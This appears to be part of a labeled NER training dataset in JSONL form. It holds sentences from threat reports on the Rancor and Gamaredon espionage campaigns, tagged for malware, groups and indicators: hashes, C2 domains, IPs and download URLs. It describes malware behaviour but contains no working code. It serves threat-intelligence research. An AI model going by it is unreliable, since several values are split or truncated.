{"text": "ShadowHammer : Liveupdate_Test_VER365.zip .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: Liveupdate_Test_VER365.zip": [[15, 41]]}, "info": {"id": "aptner_train_000973", "source": "aptner_train"}}
{"text": "ShadowHammer : aa15eb28292321b586c27d8401703494 .", "spans": {"Organization: ShadowHammer": [[0, 12]], "Indicator: aa15eb28292321b586c27d8401703494": [[15, 47]]}, "info": {"id": "aptner_train_000974", "source": "aptner_train"}}
{"text": "Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia .", "spans": {"Organization: Rancor": [[0, 6]]}, "info": {"id": "aptner_train_000975", "source": "aptner_train"}}
{"text": "In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia throughout 2017 and 2018 .", "spans": {"Organization: Unit 42": [[20, 27]], "Organization: Rancor": [[90, 96]]}, "info": {"id": "aptner_train_000976", "source": "aptner_train"}}
{"text": "In recent attacks , the group has persistently targeted at least one government organization in Cambodia from December 2018 through January 2019 .", "spans": {"Organization: government organization in": [[69, 95]]}, "info": {"id": "aptner_train_000977", "source": "aptner_train"}}
{"text": "While researching these attacks , we discovered an undocumented , custom malware family – which we ’ve named Dudell .", "spans": {"Malware: Dudell": [[109, 115]]}, "info": {"id": "aptner_train_000978", "source": "aptner_train"}}
{"text": "In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups .", "spans": {"Malware: Derusbi": [[44, 51]]}, "info": {"id": "aptner_train_000979", "source": "aptner_train"}}
{"text": "Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware   systems .", "spans": {"Organization: Rancor": [[58, 64]]}, "info": {"id": "aptner_train_000980", "source": "aptner_train"}}
{"text": "January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 .", "spans": {"Indicator: 149.28.156.61": [[22, 35]], "Malware: Derusbi": [[54, 61]], "Malware: KHRat": [[65, 70]], "Indicator: cswksfwq.kfesv.xyz": [[91, 109]], "Indicator: connect.bafunpda.xyz": [[113, 133]], "System: C2": [[137, 139]]}, "info": {"id": "aptner_train_000981", "source": "aptner_train"}}
{"text": "DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e .", "spans": {"Malware: DUDELL": [[0, 6]], "Indicator: 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e": [[18, 82]]}, "info": {"id": "aptner_train_000982", "source": "aptner_train"}}
{"text": "DUDELL : File Type :M icrosoft Excel 97 – 2 Document .", "spans": {"Malware: DUDELL": [[0, 6]], "System: :M icrosoft Excel 97": [[19, 39]]}, "info": {"id": "aptner_train_000983", "source": "aptner_train"}}
{"text": "DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls .", "spans": {"Malware: DUDELL": [[0, 6]], "Indicator: :E quipment Purchase List 2018-2020 (Final ).xls": [[19, 67]]}, "info": {"id": "aptner_train_000984", "source": "aptner_train"}}
{"text": "The DUDELL sample is a weaponized Microsoft Excel document that contains a malicious macro that runs on the victim ’s machine .", "spans": {"Malware: DUDELL": [[4, 10]], "Organization: Microsoft": [[34, 43]], "Organization: Excel": [[44, 49]], "System: malicious macro": [[75, 90]]}, "info": {"id": "aptner_train_000985", "source": "aptner_train"}}
{"text": "It shares the same malicious behavior reported by Checkpoint in Rancor : The Year of The Phish SHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de .", "spans": {"Organization: Checkpoint": [[50, 60]], "Organization: Rancor": [[64, 70]], "Malware: The Year of The Phish": [[73, 94]], "Indicator: c829f5f9ff89210c888c1559bb085ec6e65232de": [[101, 141]]}, "info": {"id": "aptner_train_000986", "source": "aptner_train"}}
{"text": "In Check Point ’s blog , the sample is from December 2018 while this sample is from April 2018 .", "spans": {"Organization: Check Point": [[3, 14]]}, "info": {"id": "aptner_train_000987", "source": "aptner_train"}}
{"text": "The macro in this document gets executed when the user views the document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document ’s properties .", "spans": {"System: macro": [[4, 9], [121, 126]]}, "info": {"id": "aptner_train_000988", "source": "aptner_train"}}
{"text": "The C2 server 199.247.6.253 is known to be used by the Rancor group .", "spans": {"System: C2": [[4, 6]], "Indicator: 199.247.6.253": [[14, 27]], "Organization: Rancor": [[55, 61]]}, "info": {"id": "aptner_train_000989", "source": "aptner_train"}}
{"text": "The script is downloading a second stage payload via the Microsoft tool msiexec .", "spans": {"Organization: Microsoft": [[57, 66]], "System: msiexec": [[72, 79]]}, "info": {"id": "aptner_train_000990", "source": "aptner_train"}}
{"text": "Unfortunately at the time of discovery , the hosted file is unavailable .", "spans": {}, "info": {"id": "aptner_train_000991", "source": "aptner_train"}}
{"text": "Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available .", "spans": {"Indicator: tmp.vbs": [[49, 56]]}, "info": {"id": "aptner_train_000992", "source": "aptner_train"}}
{"text": "Pivoting off the filename and directory , we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble .", "spans": {"Organization: Rancor": [[89, 95]], "Indicator: tmp.vbs": [[157, 164]]}, "info": {"id": "aptner_train_000993", "source": "aptner_train"}}
{"text": "File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color .", "spans": {"Indicator: office.vbs": [[5, 15]], "Indicator: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2": [[27, 91]]}, "info": {"id": "aptner_train_000994", "source": "aptner_train"}}
{"text": "Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 .", "spans": {"Indicator: tmp.vbs": [[11, 18]], "Indicator: :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8": [[19, 83]]}, "info": {"id": "aptner_train_000995", "source": "aptner_train"}}
{"text": "If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target .", "spans": {"Indicator: tmp.vbs": [[12, 19]], "Indicator: office.vbs": [[68, 78]]}, "info": {"id": "aptner_train_000996", "source": "aptner_train"}}
{"text": "DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 .", "spans": {"Malware: DDKONG": [[0, 6]], "Indicator: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[25, 89]]}, "info": {"id": "aptner_train_000997", "source": "aptner_train"}}
{"text": "DDKONG Plugin : Compile Date and Time : 2017-02-17 08:33:45 AM .", "spans": {"Malware: DDKONG": [[0, 6]]}, "info": {"id": "aptner_train_000998", "source": "aptner_train"}}
{"text": "DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: DDKONG": [[0, 6]], "System: DLL": [[46, 49]], "System: MS Windows": [[69, 79]]}, "info": {"id": "aptner_train_000999", "source": "aptner_train"}}
{"text": "DDKONG Plugin : File Name : H istory.nls .", "spans": {"Malware: DDKONG": [[0, 6]], "Indicator: H istory.nls": [[28, 40]]}, "info": {"id": "aptner_train_001000", "source": "aptner_train"}}
{"text": "The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing .", "spans": {"Malware: DllInstall": [[4, 14]]}, "info": {"id": "aptner_train_001001", "source": "aptner_train"}}
{"text": "Once this export is called , it checks for a hidden window with a caption of Hello Google !", "spans": {}, "info": {"id": "aptner_train_001002", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_001003", "source": "aptner_train"}}
{"text": "This check is performed to ensure that only one instance of the malware is running at a time .", "spans": {}, "info": {"id": "aptner_train_001004", "source": "aptner_train"}}
{"text": "The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) .", "spans": {}, "info": {"id": "aptner_train_001005", "source": "aptner_train"}}
{"text": "This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed .", "spans": {}, "info": {"id": "aptner_train_001006", "source": "aptner_train"}}
{"text": "The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 .", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[69, 87]]}, "info": {"id": "aptner_train_001007", "source": "aptner_train"}}
{"text": "Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information .", "spans": {}, "info": {"id": "aptner_train_001008", "source": "aptner_train"}}
{"text": "The data transmitted are XOR encoded .", "spans": {}, "info": {"id": "aptner_train_001009", "source": "aptner_train"}}
{"text": "The malware supports the following capabilities : Terminate specific process、Enumerate processes、Upload file、Download file、Delete file、List folder contents、Enumerate storage volumes、Execute a command、Reverse shell、Take a screenshot .", "spans": {}, "info": {"id": "aptner_train_001010", "source": "aptner_train"}}
{"text": "KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 .", "spans": {"Malware: KHRAT": [[0, 5]], "Indicator: aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380": [[17, 76]]}, "info": {"id": "aptner_train_001011", "source": "aptner_train"}}
{"text": "KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM .", "spans": {"Malware: KHRAT": [[0, 5]]}, "info": {"id": "aptner_train_001012", "source": "aptner_train"}}
{"text": "KHRAT : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: KHRAT": [[0, 5]], "System: DLL": [[38, 41]], "System: MS Windows": [[61, 71]]}, "info": {"id": "aptner_train_001013", "source": "aptner_train"}}
{"text": "KHRAT : File Name : 8081.dll .", "spans": {"Malware: KHRAT": [[0, 5]], "Indicator: 8081.dll": [[20, 28]]}, "info": {"id": "aptner_train_001014", "source": "aptner_train"}}
{"text": "Rmcmd :", "spans": {}, "info": {"id": "aptner_train_001015", "source": "aptner_train"}}
{"text": "When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs ’ ) needed .", "spans": {"System: DLL": [[9, 12]], "System: DLLs": [[92, 96]]}, "info": {"id": "aptner_train_001016", "source": "aptner_train"}}
{"text": "Once loaded and the export entry of Rmcmd is called , it creates a Windows mutex named gkdflbmdfk .", "spans": {"System: Windows mutex": [[67, 80]], "System: gkdflbmdfk": [[87, 97]]}, "info": {"id": "aptner_train_001017", "source": "aptner_train"}}
{"text": "This ensures that only one copy of the malware is running at a time .", "spans": {}, "info": {"id": "aptner_train_001018", "source": "aptner_train"}}
{"text": "It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 .", "spans": {"Indicator: connect.bafunpda.xyz": [[51, 71]]}, "info": {"id": "aptner_train_001019", "source": "aptner_train"}}
{"text": "The malware collects and transmits data from the host , such as hostname and is XOR encoded with the first byte of the network traffic being the key .", "spans": {}, "info": {"id": "aptner_train_001020", "source": "aptner_train"}}
{"text": "Reverse Shell :", "spans": {"System: Reverse Shell": [[0, 13]]}, "info": {"id": "aptner_train_001021", "source": "aptner_train"}}
{"text": "The malware behavior and code share similarities with an older KHRAT sample from May 2018 .", "spans": {"Malware: KHRAT": [[63, 68]]}, "info": {"id": "aptner_train_001022", "source": "aptner_train"}}
{"text": "Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell .", "spans": {"Indicator: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659": [[18, 82]], "System: reverse shell": [[130, 143]]}, "info": {"id": "aptner_train_001023", "source": "aptner_train"}}
{"text": "The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell .", "spans": {"System: reverse shell": [[118, 131]]}, "info": {"id": "aptner_train_001024", "source": "aptner_train"}}
{"text": "Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab .", "spans": {"Malware: Derusbi": [[0, 7]], "Indicator: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab": [[19, 78]]}, "info": {"id": "aptner_train_001025", "source": "aptner_train"}}
{"text": "Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM .", "spans": {"Malware: Derusbi": [[0, 7]]}, "info": {"id": "aptner_train_001026", "source": "aptner_train"}}
{"text": "Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: Derusbi": [[0, 7]], "System: DLL": [[40, 43]], "System: MS Windows": [[63, 73]]}, "info": {"id": "aptner_train_001027", "source": "aptner_train"}}
{"text": "Derusbi : File Name : 32.dll .", "spans": {"Malware: Derusbi": [[0, 7]], "Indicator: 32.dll": [[22, 28]]}, "info": {"id": "aptner_train_001028", "source": "aptner_train"}}
{"text": "Derusbi is a backdoor Trojan believed to be used among a small group of attackers , which includes the Rancor group .", "spans": {"Malware: Derusbi": [[0, 7]], "Malware: backdoor Trojan": [[13, 28]], "Organization: Rancor": [[103, 109]]}, "info": {"id": "aptner_train_001029", "source": "aptner_train"}}
{"text": "This particular sample is a loader that loads an encrypted payload for its functionality .", "spans": {}, "info": {"id": "aptner_train_001030", "source": "aptner_train"}}
{"text": "This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have .", "spans": {"System: DLL": [[5, 8]]}, "info": {"id": "aptner_train_001031", "source": "aptner_train"}}
{"text": "Even though we don’t have the decryption key or loader , we have uncovered some interesting artifacts .", "spans": {}, "info": {"id": "aptner_train_001032", "source": "aptner_train"}}
{"text": "If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds .", "spans": {"Indicator: myapp.exe": [[45, 54]]}, "info": {"id": "aptner_train_001033", "source": "aptner_train"}}
{"text": "Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll .", "spans": {"System: Windows": [[12, 19]], "Indicator: \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll": [[31, 74]]}, "info": {"id": "aptner_train_001034", "source": "aptner_train"}}
{"text": "Looks for a Windows device named \\Device\\acpi_010221 . n July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group .", "spans": {"System: Windows": [[12, 19]], "System: VBScript": [[98, 106]], "Indicator: Chrome.vbs": [[113, 123]], "Indicator: 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2": [[135, 199]], "Organization: Rancor": [[222, 228]]}, "info": {"id": "aptner_train_001035", "source": "aptner_train"}}
{"text": "This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT Trojan listed above in Table 2 .", "spans": {"System: VBScript": [[16, 24]], "Indicator: bafunpda.xyz": [[51, 63]], "Malware: KHRAT": [[92, 97]]}, "info": {"id": "aptner_train_001036", "source": "aptner_train"}}
{"text": "This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts .", "spans": {"System: VBScript": [[5, 13]]}, "info": {"id": "aptner_train_001037", "source": "aptner_train"}}
{"text": "The MOF file created by the VBScript is used as a persistence mechanism via Windows Management Instrumentation ( WMI ) Event Subscriptions .", "spans": {"System: MOF file": [[4, 12]], "System: VBScript": [[28, 36]], "System: Windows Management Instrumentation": [[76, 110]], "System: WMI": [[113, 116]]}, "info": {"id": "aptner_train_001038", "source": "aptner_train"}}
{"text": "MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository .", "spans": {"System: MOF files": [[0, 9]], "System: Common Information Model": [[45, 69]], "System: CIM": [[72, 75]], "System: WMI": [[116, 119]]}, "info": {"id": "aptner_train_001039", "source": "aptner_train"}}
{"text": "The technique is described by MITRE ATT&CK IDT1084 .", "spans": {"Organization: MITRE": [[30, 35]]}, "info": {"id": "aptner_train_001040", "source": "aptner_train"}}
{"text": "This particular MOF file creates a timer event that is triggered every five seconds .", "spans": {"System: MOF file": [[16, 24]]}, "info": {"id": "aptner_train_001041", "source": "aptner_train"}}
{"text": "The DLL located in the Media registry key is a variant of the KHRAT Troja .", "spans": {"System: DLL": [[4, 7]], "System: Media registry": [[23, 37]], "Malware: KHRAT": [[62, 67]], "Malware: Troja": [[68, 73]]}, "info": {"id": "aptner_train_001042", "source": "aptner_train"}}
{"text": "It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 .", "spans": {"Indicator: connect.bafunpda.xyz": [[21, 41]]}, "info": {"id": "aptner_train_001043", "source": "aptner_train"}}
{"text": "This is the same domain used by the KHRAT Trojan .", "spans": {"Malware: KHRAT": [[36, 41]]}, "info": {"id": "aptner_train_001044", "source": "aptner_train"}}
{"text": "Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia and has been found using an undocumented , custom malware family – which we ’ve dubbed Dudell – to download a second stage payload once its malicious macro is executed .", "spans": {"Organization: Rancor": [[0, 6]], "Malware: Dudell": [[205, 211]]}, "info": {"id": "aptner_train_001045", "source": "aptner_train"}}
{"text": "Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target .", "spans": {"Organization: Rancor": [[15, 21]], "Malware: Derusbi": [[40, 47]]}, "info": {"id": "aptner_train_001046", "source": "aptner_train"}}
{"text": "Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[9, 73]]}, "info": {"id": "aptner_train_001047", "source": "aptner_train"}}
{"text": "Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609": [[9, 73]]}, "info": {"id": "aptner_train_001048", "source": "aptner_train"}}
{"text": "Rancor : 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E": [[9, 73]]}, "info": {"id": "aptner_train_001049", "source": "aptner_train"}}
{"text": "Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E": [[9, 73]]}, "info": {"id": "aptner_train_001050", "source": "aptner_train"}}
{"text": "Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A": [[9, 73]]}, "info": {"id": "aptner_train_001051", "source": "aptner_train"}}
{"text": "Rancor : BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659": [[9, 73]]}, "info": {"id": "aptner_train_001052", "source": "aptner_train"}}
{"text": "Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d": [[9, 73]]}, "info": {"id": "aptner_train_001053", "source": "aptner_train"}}
{"text": "Rancor : cswksfwq.kfesv.xyz .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: cswksfwq.kfesv.xyz": [[9, 27]]}, "info": {"id": "aptner_train_001054", "source": "aptner_train"}}
{"text": "Rancor : Connect.bafunpda.xyz .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: Connect.bafunpda.xyz": [[9, 29]]}, "info": {"id": "aptner_train_001055", "source": "aptner_train"}}
{"text": "Rancor : 199.247.6.253 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 199.247.6.253": [[9, 22]]}, "info": {"id": "aptner_train_001056", "source": "aptner_train"}}
{"text": "Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign .", "spans": {"Organization: Gamaredon": [[43, 52]]}, "info": {"id": "aptner_train_001057", "source": "aptner_train"}}
{"text": "Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power .", "spans": {"Organization: Gamaredon": [[0, 9]], "Organization: Russians FSB": [[72, 84]], "Organization: Federal Security Service": [[87, 111]], "Organization: Ukrainian government": [[182, 202]]}, "info": {"id": "aptner_train_001058", "source": "aptner_train"}}
{"text": "Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same .", "spans": {"Organization: Gamaredon": [[0, 9]]}, "info": {"id": "aptner_train_001059", "source": "aptner_train"}}
{"text": "The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines .", "spans": {"Malware: Pteranodon": [[40, 50]], "Malware: Pterodo": [[54, 61]], "Malware: backdoor": [[91, 99]]}, "info": {"id": "aptner_train_001060", "source": "aptner_train"}}
{"text": "It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel .", "spans": {"System: office": [[65, 70]]}, "info": {"id": "aptner_train_001061", "source": "aptner_train"}}
{"text": "In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensification of Gamaredon Cyberattacks against military targets .", "spans": {"Organization: Ukrainian CERT": [[23, 37]], "Organization: CERT-UA": [[40, 47]]}, "info": {"id": "aptner_train_001062", "source": "aptner_train"}}
{"text": "The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez .", "spans": {}, "info": {"id": "aptner_train_001063", "source": "aptner_train"}}
{"text": "Starting from those findings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant .", "spans": {"Organization: Cybaze-Yoroi ZLab team": [[30, 52]], "Malware: Pterodo": [[114, 121]]}, "info": {"id": "aptner_train_001064", "source": "aptner_train"}}
{"text": "The complex infection chain begins with a weaponized Office document named “ f.doc ” .", "spans": {"System: Office": [[53, 58]], "Indicator: f.doc": [[76, 81]]}, "info": {"id": "aptner_train_001065", "source": "aptner_train"}}
{"text": "Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a", "spans": {"Indicator: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[7, 71]]}, "info": {"id": "aptner_train_001066", "source": "aptner_train"}}
{"text": "Threat : Gamaredon Pteranodon weaponized document .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]]}, "info": {"id": "aptner_train_001067", "source": "aptner_train"}}
{"text": "Brief Description : Doc file weaponized with Exploit .", "spans": {}, "info": {"id": "aptner_train_001068", "source": "aptner_train"}}
{"text": "Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001069", "source": "aptner_train"}}
{"text": "The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it .", "spans": {}, "info": {"id": "aptner_train_001070", "source": "aptner_train"}}
{"text": "The document leverages the common exploit aka template injection and tries to download a second stage from “ http://win-apu.ddns.net/apu.dot ” .", "spans": {"Indicator: http://win-apu.ddns.net/apu.dot": [[109, 140]]}, "info": {"id": "aptner_train_001071", "source": "aptner_train"}}
{"text": "Thanks to this  exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the “ enable macro ” button is not shown .", "spans": {"Vulnerability: Remote Code Execution": [[26, 47]], "System: macro": [[118, 123]]}, "info": {"id": "aptner_train_001072", "source": "aptner_train"}}
{"text": "The downloaded document has a “ .dot ” extension , used by Microsoft Office to save templates for different documents with similar formats .", "spans": {"Indicator: .dot": [[32, 36]], "System: Microsoft Office": [[59, 74]]}, "info": {"id": "aptner_train_001073", "source": "aptner_train"}}
{"text": "Basic Information on the “ .dot ” file are provided :", "spans": {"Indicator: .dot": [[27, 31]]}, "info": {"id": "aptner_train_001074", "source": "aptner_train"}}
{"text": "Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 .", "spans": {"Indicator: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[7, 71]]}, "info": {"id": "aptner_train_001075", "source": "aptner_train"}}
{"text": "Threat : Gamaredon Pteranodon loader dot file .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]]}, "info": {"id": "aptner_train_001076", "source": "aptner_train"}}
{"text": "Brief Description : Dot file enabling the infection of the Gamaredon Pteranodon .", "spans": {"Organization: Gamaredon": [[58, 67]], "Malware: Pteranodon": [[68, 78]]}, "info": {"id": "aptner_train_001077", "source": "aptner_train"}}
{"text": "Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001078", "source": "aptner_train"}}
{"text": "If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro .", "spans": {"System: macro": [[108, 113]]}, "info": {"id": "aptner_train_001079", "source": "aptner_train"}}
{"text": "The body of the macro can be logically divided into two distinct parts :", "spans": {"System: macro": [[16, 21]]}, "info": {"id": "aptner_train_001080", "source": "aptner_train"}}
{"text": "The first one is the setting of the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and the declaration of some other variables , such as the dropurl “ geticons.ddns.net ” .", "spans": {}, "info": {"id": "aptner_train_001081", "source": "aptner_train"}}
{"text": "The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates.vbs ” .", "spans": {"Indicator: templates.vbs": [[129, 142]]}, "info": {"id": "aptner_train_001082", "source": "aptner_train"}}
{"text": "This vbs is properly the macro executed by the macro engine of word .", "spans": {}, "info": {"id": "aptner_train_001083", "source": "aptner_train"}}
{"text": "Analyzing the content of “ templates.vbs ” it is possible to notice that it define a variable containing a URL like “ http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex . ]php ” obtained from “ hxp://get-icons.ddns . ]net/ ” & NlnQCJG & “ _ ” & uRDEJCn & “ //autoindex . ]php ” , where “ NlnQCJG ” is the name that identifies the computer on the network and “ uRDEJCn ” is the serial number of drive in hexadecimal encoding .", "spans": {"Indicator: templates.vbs": [[27, 40]], "Indicator: http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex .": [[117, 172]], "Indicator: hxp://get-icons.ddns . ]net/ ” & NlnQCJG & “ _ ” & uRDEJCn & “ //autoindex . ]php": [[196, 277]]}, "info": {"id": "aptner_train_001084", "source": "aptner_train"}}
{"text": "From this URL it tries to download another stage then storing it into “ C:\\Users\\admin\\AppData\\Roaming\\ ” path with random name .", "spans": {}, "info": {"id": "aptner_train_001085", "source": "aptner_train"}}
{"text": "At the end , “ templates.vbs ” script will force the machine to reboot .", "spans": {"Indicator: templates.vbs": [[15, 28]]}, "info": {"id": "aptner_train_001086", "source": "aptner_train"}}
{"text": "The dropped sample is an SFX archive , like the tradition of Gamaredon implants .", "spans": {"System: SFX archive": [[25, 36]], "Organization: Gamaredon": [[61, 70]]}, "info": {"id": "aptner_train_001087", "source": "aptner_train"}}
{"text": "Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f .", "spans": {"Indicator: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[7, 71]]}, "info": {"id": "aptner_train_001088", "source": "aptner_train"}}
{"text": "Threat : Gamaredon Pteranodon implant SFX archive .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]], "System: SFX archive": [[38, 49]]}, "info": {"id": "aptner_train_001089", "source": "aptner_train"}}
{"text": "Brief Description : SFX Archive First Stage .", "spans": {}, "info": {"id": "aptner_train_001090", "source": "aptner_train"}}
{"text": "Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001091", "source": "aptner_train"}}
{"text": "By simply opening the SFX archive , it is possible to notice two different files that are shown below and named respectively “ 8957.cmd ” and “ 28847 ” .", "spans": {"System: SFX archive": [[22, 33]], "Indicator: 8957.cmd": [[126, 134]], "Indicator: 28847": [[143, 148]]}, "info": {"id": "aptner_train_001092", "source": "aptner_train"}}
{"text": "When executed , the SFX archive will be extracted and the “ 8957.cmd ” will be run .", "spans": {"System: SFX archive": [[20, 31]], "Indicator: 8957.cmd": [[60, 68]]}, "info": {"id": "aptner_train_001093", "source": "aptner_train"}}
